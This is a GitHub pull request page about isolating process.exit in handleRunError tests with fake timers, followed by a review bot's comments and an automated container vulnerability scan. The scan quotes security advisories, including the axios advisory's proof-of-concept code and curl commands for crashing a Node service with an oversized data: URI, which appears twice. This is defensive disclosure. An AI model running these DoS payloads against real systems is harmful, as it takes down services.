Skip to content

Conversation

@anatolyshipitz
Copy link
Collaborator

@anatolyshipitz anatolyshipitz commented Oct 30, 2025

  • Updated tests in src/index.test.ts to use fake timers and ensure that process.exit is called only after the test completes, preventing race conditions.
  • Enhanced test coverage to verify that process.exit is not called immediately and is invoked correctly after a timeout.

These changes improve test reliability and prevent CI/CD failures due to unhandled process exits.

Summary by CodeRabbit

  • Tests
    • Improved test reliability with enhanced async timer handling and comprehensive error handling verification.

- Introduced a new documentation file outlining a bug related to unexpected process.exit calls during test execution, which blocks CI/CD pipelines.
- Updated tests in src/index.test.ts to use fake timers and ensure that process.exit is called only after the test completes, preventing race conditions.
- Enhanced test coverage to verify that process.exit is not called immediately and is invoked correctly after a timeout.

These changes improve test reliability and prevent CI/CD failures due to unhandled process exits.
@anatolyshipitz anatolyshipitz self-assigned this Oct 30, 2025
@coderabbitai
Copy link

coderabbitai bot commented Oct 30, 2025

Walkthrough

Test refactoring for handleRunError function to use fake timers for controlling asynchronous behavior, adding cleanup procedures, and introducing new test cases for process exit invocation and logging with both string and Error object inputs.

Changes

Cohort / File(s) Summary
Test timer handling and error handling
workers/main/src/index.test.ts
Implemented fake timer setup with vi.useFakeTimers() and teardown with vi.runAllTimers() and timer restoration. Replaced hard-failed process.exit mock with no-op. Added tests verifying process.exit invocation with code 1 after 100ms timeout, and logging behavior for string and Error object error inputs.

Estimated code review effort

🎯 2 (Simple) | ⏱️ ~10 minutes

  • Straightforward test refactoring with consistent patterns across setup/teardown and new test cases
  • Verify timer mock behavior aligns with handleRunError implementation expectations
  • Ensure new test assertions correctly validate process exit code and logging side effects

Poem

A rabbit hops through test files with glee,
Fake timers ticking in harmony,
Mock exits and logs now shine so bright,
Error handling tested just right! 🐰⏱️
The tests now run with perfect timing,
All async behaviors aligning! ✨

Pre-merge checks and finishing touches

❌ Failed checks (1 warning)
Check name Status Explanation Resolution
Docstring Coverage ⚠️ Warning Docstring coverage is 0.00% which is insufficient. The required threshold is 80.00%. You can run @coderabbitai generate docstrings to improve docstring coverage.
✅ Passed checks (2 passed)
Check name Status Explanation
Description Check ✅ Passed Check skipped - CodeRabbit’s high-level summary is enabled.
Title Check ✅ Passed The PR title "Add test isolation for process.exit in handleRunError function" accurately and directly describes the main objective of the changeset. The test file modifications implement fake timers, prevent process.exit race conditions, and enhance test coverage specifically for process.exit behavior—all of which align with the stated goal of adding test isolation. The title is concise, specific, and clearly communicates to reviewers that this PR addresses timing and test isolation issues in the handleRunError tests.
✨ Finishing touches
  • 📝 Generate docstrings
🧪 Generate unit tests (beta)
  • Create PR with unit tests
  • Post copyable unit tests in a comment
  • Commit unit tests in branch issue/process-exit-test-race-condition

Thanks for using CodeRabbit! It's free for OSS, and your support helps us grow. If you like it, consider giving us a shout-out.

❤️ Share

Comment @coderabbitai help to get the list of available commands and usage tips.

- Deleted the documentation file outlining the bug related to unexpected process.exit calls during test execution, which was previously blocking CI/CD pipelines.
- This removal reflects the resolution of the issue and the completion of related fixes in the testing framework.

The changes streamline the documentation and indicate that the problem has been addressed.
@github-actions
Copy link

github-actions bot commented Oct 30, 2025

🔍 Vulnerabilities of n8n-test:latest

📦 Image Reference n8n-test:latest
digestsha256:7c11dcf942a81036772fabcad50900407be2d0f48bb028586b035fe243c70b89
vulnerabilitiescritical: 2 high: 14 medium: 0 low: 0
platformlinux/amd64
size335 MB
packages1844
📦 Base Image node:22-alpine
also known as
  • 22-alpine3.22
  • 22.19-alpine
  • 22.19-alpine3.22
  • 22.19.0-alpine
  • 22.19.0-alpine3.22
  • jod-alpine
  • jod-alpine3.22
  • lts-alpine
  • lts-alpine3.22
digestsha256:704b199e36b5c1bc505da773f742299dc1ee5a4c70b86d1eb406c334f63253c6
vulnerabilitiescritical: 0 high: 1 medium: 2 low: 2
critical: 2 high: 2 medium: 0 low: 0 libxml2 2.13.8-r0 (apk)

pkg:apk/alpine/libxml2@2.13.8-r0?os_name=alpine&os_version=3.22

critical : CVE--2025--49796

Affected range<2.13.9-r0
Fixed version2.13.9-r0
EPSS Score0.438%
EPSS Percentile62nd percentile
Description

critical : CVE--2025--49794

Affected range<2.13.9-r0
Fixed version2.13.9-r0
EPSS Score0.251%
EPSS Percentile48th percentile
Description

high : CVE--2025--6021

Affected range<2.13.9-r0
Fixed version2.13.9-r0
EPSS Score0.546%
EPSS Percentile67th percentile
Description

high : CVE--2025--49795

Affected range<2.13.9-r0
Fixed version2.13.9-r0
EPSS Score0.141%
EPSS Percentile35th percentile
Description
critical: 0 high: 2 medium: 0 low: 0 xlsx 0.20.2 (npm)

pkg:npm/xlsx@0.20.2

high 7.8: CVE--2023--30533 OWASP Top Ten 2017 Category A9 - Using Components with Known Vulnerabilities

Affected range>=0
Fixed versionNot Fixed
CVSS Score7.8
CVSS VectorCVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
EPSS Score4.328%
EPSS Percentile88th percentile
Description

All versions of SheetJS CE through 0.19.2 are vulnerable to "Prototype Pollution" when reading specially crafted files. Workflows that do not read arbitrary files (for example, exporting data to spreadsheet files) are unaffected.

A non-vulnerable version cannot be found via npm, as the repository hosted on GitHub and the npm package xlsx are no longer maintained. Version 0.19.3 can be downloaded via https://cdn.sheetjs.com/.

high 7.5: CVE--2024--22363 OWASP Top Ten 2017 Category A9 - Using Components with Known Vulnerabilities

Affected range>=0
Fixed versionNot Fixed
CVSS Score7.5
CVSS VectorCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
EPSS Score0.079%
EPSS Percentile24th percentile
Description

SheetJS Community Edition before 0.20.2 is vulnerable.to Regular Expression Denial of Service (ReDoS).

A non-vulnerable version cannot be found via npm, as the repository hosted on GitHub and the npm package xlsx are no longer maintained. Version 0.20.2 can be downloaded via https://cdn.sheetjs.com/.

critical: 0 high: 1 medium: 0 low: 0 axios 1.11.0 (npm)

pkg:npm/axios@1.11.0

high 7.5: CVE--2025--58754 Allocation of Resources Without Limits or Throttling

Affected range>=1.0.0
<1.12.0
Fixed version1.12.0
CVSS Score7.5
CVSS VectorCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
EPSS Score0.025%
EPSS Percentile5th percentile
Description

Summary

When Axios runs on Node.js and is given a URL with the data: scheme, it does not perform HTTP. Instead, its Node http adapter decodes the entire payload into memory (Buffer/Blob) and returns a synthetic 200 response.
This path ignores maxContentLength / maxBodyLength (which only protect HTTP responses), so an attacker can supply a very large data: URI and cause the process to allocate unbounded memory and crash (DoS), even if the caller requested responseType: 'stream'.

Details

The Node adapter (lib/adapters/http.js) supports the data: scheme. When axios encounters a request whose URL starts with data:, it does not perform an HTTP request. Instead, it calls fromDataURI() to decode the Base64 payload into a Buffer or Blob.

Relevant code from [httpAdapter](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/adapters/http.js#L231):

const fullPath = buildFullPath(config.baseURL, config.url, config.allowAbsoluteUrls);
const parsed = new URL(fullPath, platform.hasBrowserEnv ? platform.origin : undefined);
const protocol = parsed.protocol || supportedProtocols[0];

if (protocol === 'data:') {
  let convertedData;
  if (method !== 'GET') {
    return settle(resolve, reject, { status: 405, ... });
  }
  convertedData = fromDataURI(config.url, responseType === 'blob', {
    Blob: config.env && config.env.Blob
  });
  return settle(resolve, reject, { data: convertedData, status: 200, ... });
}

The decoder is in [lib/helpers/fromDataURI.js](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/helpers/fromDataURI.js#L27):

export default function fromDataURI(uri, asBlob, options) {
  ...
  if (protocol === 'data') {
    uri = protocol.length ? uri.slice(protocol.length + 1) : uri;
    const match = DATA_URL_PATTERN.exec(uri);
    ...
    const body = match[3];
    const buffer = Buffer.from(decodeURIComponent(body), isBase64 ? 'base64' : 'utf8');
    if (asBlob) { return new _Blob([buffer], {type: mime}); }
    return buffer;
  }
  throw new AxiosError('Unsupported protocol ' + protocol, ...);
}
  • The function decodes the entire Base64 payload into a Buffer with no size limits or sanity checks.
  • It does not honour config.maxContentLength or config.maxBodyLength, which only apply to HTTP streams.
  • As a result, a data: URI of arbitrary size can cause the Node process to allocate the entire content into memory.

In comparison, normal HTTP responses are monitored for size, the HTTP adapter accumulates the response into a buffer and will reject when totalResponseBytes exceeds [maxContentLength](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/adapters/http.js#L550). No such check occurs for data: URIs.

PoC

const axios = require('axios');

async function main() {
  // this example decodes ~120 MB
  const base64Size = 160_000_000; // 120 MB after decoding
  const base64 = 'A'.repeat(base64Size);
  const uri = 'data:application/octet-stream;base64,' + base64;

  console.log('Generating URI with base64 length:', base64.length);
  const response = await axios.get(uri, {
    responseType: 'arraybuffer'
  });

  console.log('Received bytes:', response.data.length);
}

main().catch(err => {
  console.error('Error:', err.message);
});

Run with limited heap to force a crash:

node --max-old-space-size=100 poc.js

Since Node heap is capped at 100 MB, the process terminates with an out-of-memory error:

<--- Last few GCs --->
…
FATAL ERROR: Reached heap limit Allocation failed - JavaScript heap out of memory
1: 0x… node::Abort() …
…

Mini Real App PoC:
A small link-preview service that uses axios streaming, keep-alive agents, timeouts, and a JSON body. It allows data: URLs which axios fully ignore maxContentLength , maxBodyLength and decodes into memory on Node before streaming enabling DoS.

import express from "express";
import morgan from "morgan";
import axios from "axios";
import http from "node:http";
import https from "node:https";
import { PassThrough } from "node:stream";

const keepAlive = true;
const httpAgent = new http.Agent({ keepAlive, maxSockets: 100 });
const httpsAgent = new https.Agent({ keepAlive, maxSockets: 100 });
const axiosClient = axios.create({
  timeout: 10000,
  maxRedirects: 5,
  httpAgent, httpsAgent,
  headers: { "User-Agent": "axios-poc-link-preview/0.1 (+node)" },
  validateStatus: c => c >= 200 && c < 400
});

const app = express();
const PORT = Number(process.env.PORT || 8081);
const BODY_LIMIT = process.env.MAX_CLIENT_BODY || "50mb";

app.use(express.json({ limit: BODY_LIMIT }));
app.use(morgan("combined"));

app.get("/healthz", (req,res)=>res.send("ok"));

/**
 * POST /preview { "url": "<http|https|data URL>" }
 * Uses axios streaming but if url is data:, axios fully decodes into memory first (DoS vector).
 */

app.post("/preview", async (req, res) => {
  const url = req.body?.url;
  if (!url) return res.status(400).json({ error: "missing url" });

  let u;
  try { u = new URL(String(url)); } catch { return res.status(400).json({ error: "invalid url" }); }

  // Developer allows using data:// in the allowlist
  const allowed = new Set(["http:", "https:", "data:"]);
  if (!allowed.has(u.protocol)) return res.status(400).json({ error: "unsupported scheme" });

  const controller = new AbortController();
  const onClose = () => controller.abort();
  res.on("close", onClose);

  const before = process.memoryUsage().heapUsed;

  try {
    const r = await axiosClient.get(u.toString(), {
      responseType: "stream",
      maxContentLength: 8 * 1024, // Axios will ignore this for data:
      maxBodyLength: 8 * 1024,    // Axios will ignore this for data:
      signal: controller.signal
    });

    // stream only the first 64KB back
    const cap = 64 * 1024;
    let sent = 0;
    const limiter = new PassThrough();
    r.data.on("data", (chunk) => {
      if (sent + chunk.length > cap) { limiter.end(); r.data.destroy(); }
      else { sent += chunk.length; limiter.write(chunk); }
    });
    r.data.on("end", () => limiter.end());
    r.data.on("error", (e) => limiter.destroy(e));

    const after = process.memoryUsage().heapUsed;
    res.set("x-heap-increase-mb", ((after - before)/1024/1024).toFixed(2));
    limiter.pipe(res);
  } catch (err) {
    const after = process.memoryUsage().heapUsed;
    res.set("x-heap-increase-mb", ((after - before)/1024/1024).toFixed(2));
    res.status(502).json({ error: String(err?.message || err) });
  } finally {
    res.off("close", onClose);
  }
});

app.listen(PORT, () => {
  console.log(`axios-poc-link-preview listening on http://0.0.0.0:${PORT}`);
  console.log(`Heap cap via NODE_OPTIONS, JSON limit via MAX_CLIENT_BODY (default ${BODY_LIMIT}).`);
});

Run this app and send 3 post requests:

SIZE_MB=35 node -e 'const n=+process.env.SIZE_MB*1024*1024; const b=Buffer.alloc(n,65).toString("base64"); process.stdout.write(JSON.stringify({url:"data:application/octet-stream;base64,"+b}))' \
| tee payload.json >/dev/null
seq 1 3 | xargs -P3 -I{} curl -sS -X POST "$URL" -H 'Content-Type: application/json' --data-binary @payload.json -o /dev/null```

Suggestions

  1. Enforce size limits
    For protocol === 'data:', inspect the length of the Base64 payload before decoding. If config.maxContentLength or config.maxBodyLength is set, reject URIs whose payload exceeds the limit.

  2. Stream decoding
    Instead of decoding the entire payload in one Buffer.from call, decode the Base64 string in chunks using a streaming Base64 decoder. This would allow the application to process the data incrementally and abort if it grows too large.

critical: 0 high: 1 medium: 0 low: 0 n8n-nodes-base 1.107.0 (npm)

pkg:npm/n8n-nodes-base@1.107.0

high 8.8: GHSA--365g--vjw2--grx8 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')

Affected range<=1.113.0
Fixed versionNot Fixed
CVSS Score8.8
CVSS VectorCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Description

Impact

The Execute Command node in n8n allows execution of arbitrary commands on the host system where n8n runs. While this functionality is intended for advanced automation and can be useful in certain workflows, it poses a security risk if all users with access to the n8n instance are not fully trusted.

An attacker—either a malicious user or someone who has compromised a legitimate user account—could exploit this node to run arbitrary commands on the host machine, potentially leading to data exfiltration, service disruption, or full system compromise.

This vulnerability affects all n8n deployments where:

  • The Execute Command node is enabled, and
  • Not all user accounts are strictly controlled and trusted.

n8n.cloud is not impacted.

Patches

No code changes have been made to alter the behavior of the Execute Command node. The recommended mitigation is to disable the node by default in environments where it is not explicitly required.

Future n8n versions may change the default availability of this node.

Workarounds

Administrators can disable the Execute Command node by setting the following environment variable before starting n8n:

export NODES_EXCLUDE: "[\"n8n-nodes-base.executeCommand\"]"

References

n8n docs: Execute Command
n8n docs: Blocking nodes

critical: 0 high: 1 medium: 0 low: 0 n8n 1.109.2 (npm)

pkg:npm/n8n@1.109.2

high 8.8: GHSA--365g--vjw2--grx8 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')

Affected range<=1.114.4
Fixed versionNot Fixed
CVSS Score8.8
CVSS VectorCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Description

Impact

The Execute Command node in n8n allows execution of arbitrary commands on the host system where n8n runs. While this functionality is intended for advanced automation and can be useful in certain workflows, it poses a security risk if all users with access to the n8n instance are not fully trusted.

An attacker—either a malicious user or someone who has compromised a legitimate user account—could exploit this node to run arbitrary commands on the host machine, potentially leading to data exfiltration, service disruption, or full system compromise.

This vulnerability affects all n8n deployments where:

  • The Execute Command node is enabled, and
  • Not all user accounts are strictly controlled and trusted.

n8n.cloud is not impacted.

Patches

No code changes have been made to alter the behavior of the Execute Command node. The recommended mitigation is to disable the node by default in environments where it is not explicitly required.

Future n8n versions may change the default availability of this node.

Workarounds

Administrators can disable the Execute Command node by setting the following environment variable before starting n8n:

export NODES_EXCLUDE: "[\"n8n-nodes-base.executeCommand\"]"

References

n8n docs: Execute Command
n8n docs: Blocking nodes

critical: 0 high: 1 medium: 0 low: 0 axios 1.8.3 (npm)

pkg:npm/axios@1.8.3

high 7.5: CVE--2025--58754 Allocation of Resources Without Limits or Throttling

Affected range>=1.0.0
<1.12.0
Fixed version1.12.0
CVSS Score7.5
CVSS VectorCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
EPSS Score0.025%
EPSS Percentile5th percentile
Description

Summary

When Axios runs on Node.js and is given a URL with the data: scheme, it does not perform HTTP. Instead, its Node http adapter decodes the entire payload into memory (Buffer/Blob) and returns a synthetic 200 response.
This path ignores maxContentLength / maxBodyLength (which only protect HTTP responses), so an attacker can supply a very large data: URI and cause the process to allocate unbounded memory and crash (DoS), even if the caller requested responseType: 'stream'.

Details

The Node adapter (lib/adapters/http.js) supports the data: scheme. When axios encounters a request whose URL starts with data:, it does not perform an HTTP request. Instead, it calls fromDataURI() to decode the Base64 payload into a Buffer or Blob.

Relevant code from [httpAdapter](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/adapters/http.js#L231):

const fullPath = buildFullPath(config.baseURL, config.url, config.allowAbsoluteUrls);
const parsed = new URL(fullPath, platform.hasBrowserEnv ? platform.origin : undefined);
const protocol = parsed.protocol || supportedProtocols[0];

if (protocol === 'data:') {
  let convertedData;
  if (method !== 'GET') {
    return settle(resolve, reject, { status: 405, ... });
  }
  convertedData = fromDataURI(config.url, responseType === 'blob', {
    Blob: config.env && config.env.Blob
  });
  return settle(resolve, reject, { data: convertedData, status: 200, ... });
}

The decoder is in [lib/helpers/fromDataURI.js](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/helpers/fromDataURI.js#L27):

export default function fromDataURI(uri, asBlob, options) {
  ...
  if (protocol === 'data') {
    uri = protocol.length ? uri.slice(protocol.length + 1) : uri;
    const match = DATA_URL_PATTERN.exec(uri);
    ...
    const body = match[3];
    const buffer = Buffer.from(decodeURIComponent(body), isBase64 ? 'base64' : 'utf8');
    if (asBlob) { return new _Blob([buffer], {type: mime}); }
    return buffer;
  }
  throw new AxiosError('Unsupported protocol ' + protocol, ...);
}
  • The function decodes the entire Base64 payload into a Buffer with no size limits or sanity checks.
  • It does not honour config.maxContentLength or config.maxBodyLength, which only apply to HTTP streams.
  • As a result, a data: URI of arbitrary size can cause the Node process to allocate the entire content into memory.

In comparison, normal HTTP responses are monitored for size, the HTTP adapter accumulates the response into a buffer and will reject when totalResponseBytes exceeds [maxContentLength](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/adapters/http.js#L550). No such check occurs for data: URIs.

PoC

const axios = require('axios');

async function main() {
  // this example decodes ~120 MB
  const base64Size = 160_000_000; // 120 MB after decoding
  const base64 = 'A'.repeat(base64Size);
  const uri = 'data:application/octet-stream;base64,' + base64;

  console.log('Generating URI with base64 length:', base64.length);
  const response = await axios.get(uri, {
    responseType: 'arraybuffer'
  });

  console.log('Received bytes:', response.data.length);
}

main().catch(err => {
  console.error('Error:', err.message);
});

Run with limited heap to force a crash:

node --max-old-space-size=100 poc.js

Since Node heap is capped at 100 MB, the process terminates with an out-of-memory error:

<--- Last few GCs --->
…
FATAL ERROR: Reached heap limit Allocation failed - JavaScript heap out of memory
1: 0x… node::Abort() …
…

Mini Real App PoC:
A small link-preview service that uses axios streaming, keep-alive agents, timeouts, and a JSON body. It allows data: URLs which axios fully ignore maxContentLength , maxBodyLength and decodes into memory on Node before streaming enabling DoS.

import express from "express";
import morgan from "morgan";
import axios from "axios";
import http from "node:http";
import https from "node:https";
import { PassThrough } from "node:stream";

const keepAlive = true;
const httpAgent = new http.Agent({ keepAlive, maxSockets: 100 });
const httpsAgent = new https.Agent({ keepAlive, maxSockets: 100 });
const axiosClient = axios.create({
  timeout: 10000,
  maxRedirects: 5,
  httpAgent, httpsAgent,
  headers: { "User-Agent": "axios-poc-link-preview/0.1 (+node)" },
  validateStatus: c => c >= 200 && c < 400
});

const app = express();
const PORT = Number(process.env.PORT || 8081);
const BODY_LIMIT = process.env.MAX_CLIENT_BODY || "50mb";

app.use(express.json({ limit: BODY_LIMIT }));
app.use(morgan("combined"));

app.get("/healthz", (req,res)=>res.send("ok"));

/**
 * POST /preview { "url": "<http|https|data URL>" }
 * Uses axios streaming but if url is data:, axios fully decodes into memory first (DoS vector).
 */

app.post("/preview", async (req, res) => {
  const url = req.body?.url;
  if (!url) return res.status(400).json({ error: "missing url" });

  let u;
  try { u = new URL(String(url)); } catch { return res.status(400).json({ error: "invalid url" }); }

  // Developer allows using data:// in the allowlist
  const allowed = new Set(["http:", "https:", "data:"]);
  if (!allowed.has(u.protocol)) return res.status(400).json({ error: "unsupported scheme" });

  const controller = new AbortController();
  const onClose = () => controller.abort();
  res.on("close", onClose);

  const before = process.memoryUsage().heapUsed;

  try {
    const r = await axiosClient.get(u.toString(), {
      responseType: "stream",
      maxContentLength: 8 * 1024, // Axios will ignore this for data:
      maxBodyLength: 8 * 1024,    // Axios will ignore this for data:
      signal: controller.signal
    });

    // stream only the first 64KB back
    const cap = 64 * 1024;
    let sent = 0;
    const limiter = new PassThrough();
    r.data.on("data", (chunk) => {
      if (sent + chunk.length > cap) { limiter.end(); r.data.destroy(); }
      else { sent += chunk.length; limiter.write(chunk); }
    });
    r.data.on("end", () => limiter.end());
    r.data.on("error", (e) => limiter.destroy(e));

    const after = process.memoryUsage().heapUsed;
    res.set("x-heap-increase-mb", ((after - before)/1024/1024).toFixed(2));
    limiter.pipe(res);
  } catch (err) {
    const after = process.memoryUsage().heapUsed;
    res.set("x-heap-increase-mb", ((after - before)/1024/1024).toFixed(2));
    res.status(502).json({ error: String(err?.message || err) });
  } finally {
    res.off("close", onClose);
  }
});

app.listen(PORT, () => {
  console.log(`axios-poc-link-preview listening on http://0.0.0.0:${PORT}`);
  console.log(`Heap cap via NODE_OPTIONS, JSON limit via MAX_CLIENT_BODY (default ${BODY_LIMIT}).`);
});

Run this app and send 3 post requests:

SIZE_MB=35 node -e 'const n=+process.env.SIZE_MB*1024*1024; const b=Buffer.alloc(n,65).toString("base64"); process.stdout.write(JSON.stringify({url:"data:application/octet-stream;base64,"+b}))' \
| tee payload.json >/dev/null
seq 1 3 | xargs -P3 -I{} curl -sS -X POST "$URL" -H 'Content-Type: application/json' --data-binary @payload.json -o /dev/null```

Suggestions

  1. Enforce size limits
    For protocol === 'data:', inspect the length of the Base64 payload before decoding. If config.maxContentLength or config.maxBodyLength is set, reject URIs whose payload exceeds the limit.

  2. Stream decoding
    Instead of decoding the entire payload in one Buffer.from call, decode the Base64 string in chunks using a streaming Base64 decoder. This would allow the application to process the data incrementally and abort if it grows too large.

critical: 0 high: 1 medium: 0 low: 0 openssl 3.5.2-r0 (apk)

pkg:apk/alpine/openssl@3.5.2-r0?os_name=alpine&os_version=3.22

high : CVE--2025--9230

Affected range<3.5.4-r0
Fixed version3.5.4-r0
EPSS Score0.026%
EPSS Percentile6th percentile
Description
critical: 0 high: 1 medium: 0 low: 0 tar-fs 2.1.3 (npm)

pkg:npm/tar-fs@2.1.3

high 8.7: CVE--2025--59343 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')

Affected range>=2.0.0
<2.1.4
Fixed version2.1.4
CVSS Score8.7
CVSS VectorCVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N
EPSS Score0.024%
EPSS Percentile5th percentile
Description

Impact

v3.1.0, v2.1.3, v1.16.5 and below

Patches

Has been patched in 3.1.1, 2.1.4, and 1.16.6

Workarounds

You can use the ignore option to ignore non files/directories.

  ignore (_, header) {
    // pass files & directories, ignore e.g. symlinks
    return header.type !== 'file' && header.type !== 'directory'
  }

Credit

Reported by: Mapta / BugBunny_ai

critical: 0 high: 1 medium: 0 low: 0 expat 2.7.1-r0 (apk)

pkg:apk/alpine/expat@2.7.1-r0?os_name=alpine&os_version=3.22

high : CVE--2025--59375

Affected range<2.7.2-r0
Fixed version2.7.2-r0
EPSS Score0.102%
EPSS Percentile29th percentile
Description
critical: 0 high: 1 medium: 0 low: 0 curl 8.14.1-r1 (apk)

pkg:apk/alpine/curl@8.14.1-r1?os_name=alpine&os_version=3.22

high : CVE--2025--9086

Affected range<8.14.1-r2
Fixed version8.14.1-r2
EPSS Score0.077%
EPSS Percentile24th percentile
Description
critical: 0 high: 1 medium: 0 low: 0 playwright 1.54.2 (npm)

pkg:npm/playwright@1.54.2

high 8.7: CVE--2025--59288 Improper Verification of Cryptographic Signature

Affected range<1.55.1
Fixed version1.55.1
CVSS Score8.7
CVSS VectorCVSS:4.0/AV:N/AC:H/AT:P/PR:H/UI:A/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H
EPSS Score0.027%
EPSS Percentile6th percentile
Description

Summary

Use of curl with the -k (or --insecure) flag in installer scripts allows attackers to deliver arbitrary executables via Man-in-the-Middle (MitM) attacks. This can lead to full system compromise, as the downloaded files are installed as privileged applications.

Details

The following scripts in the microsoft/playwright repository at commit bee11cbc28f24bd18e726163d0b9b1571b4f26a8 use curl -k to fetch and install executable packages without verifying the authenticity of the SSL certificate:

In each case, the shell scripts download a browser installer package using curl -k and immediately install it:

curl --retry 3 -o ./<pkg-file> -k <url>
sudo installer -pkg /tmp/<pkg-file> -target /

Disabling SSL verification (-k) means the download can be intercepted and replaced with malicious content.

PoC

A high-level exploitation scenario:

  1. An attacker performs a MitM attack on a network where the victim runs one of these scripts.
  2. The attacker intercepts the HTTPS request and serves a malicious package (for example, a trojaned browser installer).
  3. Because curl -k is used, the script downloads and installs the attacker's payload without any certificate validation.
  4. The attacker's code is executed with system privileges, leading to full compromise.

No special configuration is needed: simply running these scripts on any untrusted or hostile network is enough.

Impact

This is a critical Remote Code Execution (RCE) vulnerability due to improper SSL certificate validation (CWE-295: Improper Certificate Validation). Any user or automation running these scripts is at risk of arbitrary code execution as root/admin, system compromise, data theft, or persistent malware installation. The risk is especially severe because browser packages are installed with elevated privileges and the scripts may be used in CI/CD or developer environments.

Fix

Credit

  • This vulnerability was uncovered by tooling by Socket
  • This vulnerability was confirmed by @evilpacket
  • This vulnerability was reported by @JLLeitschuh at Socket

Disclosure

critical: 0 high: 1 medium: 0 low: 0 openssh 10.0_p1-r7 (apk)

pkg:apk/alpine/openssh@10.0_p1-r7?os_name=alpine&os_version=3.22

high : CVE--2023--51767

Affected range<=10.0_p1-r7
Fixed versionNot Fixed
EPSS Score0.008%
EPSS Percentile1st percentile
Description

@sonarqubecloud
Copy link

Copy link

@coderabbitai coderabbitai bot left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Actionable comments posted: 0

Caution

Some comments are outside the diff and can’t be posted inline due to platform limitations.

⚠️ Outside diff range comments (1)
workers/main/src/index.test.ts (1)

46-55: Remove duplicate test case.

This test case duplicates the coverage from lines 25-35. Both verify that handleRunError logs the error message when passed an Error object. The test on lines 25-35 already provides this coverage.

Apply this diff to remove the duplicate:

-  it('should log when error is an Error object', () => {
-    const error = new Error('error from Error object');
-    const logSpy = vi.spyOn(logger, 'error').mockImplementation(() => {});
-
-    handleRunError(error);
-    expect(logSpy).toHaveBeenCalledWith(
-      `Error in main worker: ${error.message}`,
-    );
-    logSpy.mockRestore();
-  });
-
🧹 Nitpick comments (1)
workers/main/src/index.test.ts (1)

57-73: Excellent test coverage for the timeout behavior.

This test properly verifies that process.exit is not called immediately but is invoked after the 100ms timeout, which directly addresses the race condition issue described in the PR objectives.

Note: The logSpy on line 59 is created and restored but never used in assertions. If it's intended to suppress console output, consider adding a comment to clarify its purpose, or remove it if unnecessary:

  it('should call process.exit with code 1 after timeout', () => {
    const error = new Error('test error');
-    const logSpy = vi.spyOn(logger, 'error').mockImplementation(() => {});

    handleRunError(error);

    // Process.exit should not be called immediately
    expect(processExitSpy).not.toHaveBeenCalled();

    // Fast-forward time by 100ms
    vi.advanceTimersByTime(100);

    // Now process.exit should have been called
    expect(processExitSpy).toHaveBeenCalledWith(1);
-
-    logSpy.mockRestore();
  });
📜 Review details

Configuration used: Path: .coderabbit.yml

Review profile: CHILL

Plan: Pro

📥 Commits

Reviewing files that changed from the base of the PR and between d9b7191 and 0c52f2d.

📒 Files selected for processing (1)
  • workers/main/src/index.test.ts (2 hunks)
🧰 Additional context used
📓 Path-based instructions (2)
**/*.test.ts

📄 CodeRabbit inference engine (CLAUDE.md)

Tests are co-located with source files and should be named with the pattern *.test.ts

Files:

  • workers/main/src/index.test.ts
**/*.{ts,tsx}

📄 CodeRabbit inference engine (CLAUDE.md)

**/*.{ts,tsx}: Follow the function naming pattern: prefix? + action (A) + high context (HC) + low context? (LC), using action verbs such as get, fetch, send, create, validate, handle, calculate, and boolean prefixes is, has, should
Use descriptive, unabbreviated variable names; use singular for single values and plural for collections; ensure variable names are context-specific

Files:

  • workers/main/src/index.test.ts
🧠 Learnings (2)
📓 Common learnings
Learnt from: anatolyshipitz
PR: speedandfunction/automatization#34
File: workers/main/src/workflows/financial/FinancialReportFormatter.ts:3-7
Timestamp: 2025-05-30T17:57:21.010Z
Learning: User anatolyshipitz prefers to keep code implementations simple during early development stages rather than adding comprehensive error handling and validation. They consider extensive type annotations and error handling "redundant" when focusing on core functionality and testing.
📚 Learning: 2025-08-05T13:42:48.295Z
Learnt from: CR
PR: speedandfunction/automatization#0
File: CLAUDE.md:0-0
Timestamp: 2025-08-05T13:42:48.295Z
Learning: Applies to workers/main/vitest.config.ts : Test configuration should be defined in workers/main/vitest.config.ts

Applied to files:

  • workers/main/src/index.test.ts
🧬 Code graph analysis (1)
workers/main/src/index.test.ts (1)
workers/main/src/index.ts (2)
  • logger (8-8)
  • handleRunError (43-48)
⏰ Context from checks skipped due to timeout of 90000ms. You can increase the timeout in your CodeRabbit configuration to a maximum of 15 minutes (900000ms). (1)
  • GitHub Check: Docker Security Scanning (n8n, Dockerfile.n8n, n8n-test:latest)
🔇 Additional comments (2)
workers/main/src/index.test.ts (2)

8-15: LGTM! Fake timers setup properly isolates timing behavior.

The use of fake timers and the no-op mock for process.exit correctly prevents race conditions and actual process termination during tests.


17-23: Good cleanup pattern to prevent timer leaks.

Running all pending timers before restoring mocks ensures that any scheduled process.exit calls use the mocked version rather than the real one. This effectively prevents race conditions.

@anatolyshipitz anatolyshipitz merged commit 6d2b90e into main Oct 30, 2025
12 checks passed
@anatolyshipitz anatolyshipitz deleted the issue/process-exit-test-race-condition branch October 30, 2025 11:08
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

None yet

Projects

None yet

Development

Successfully merging this pull request may close these issues.

2 participants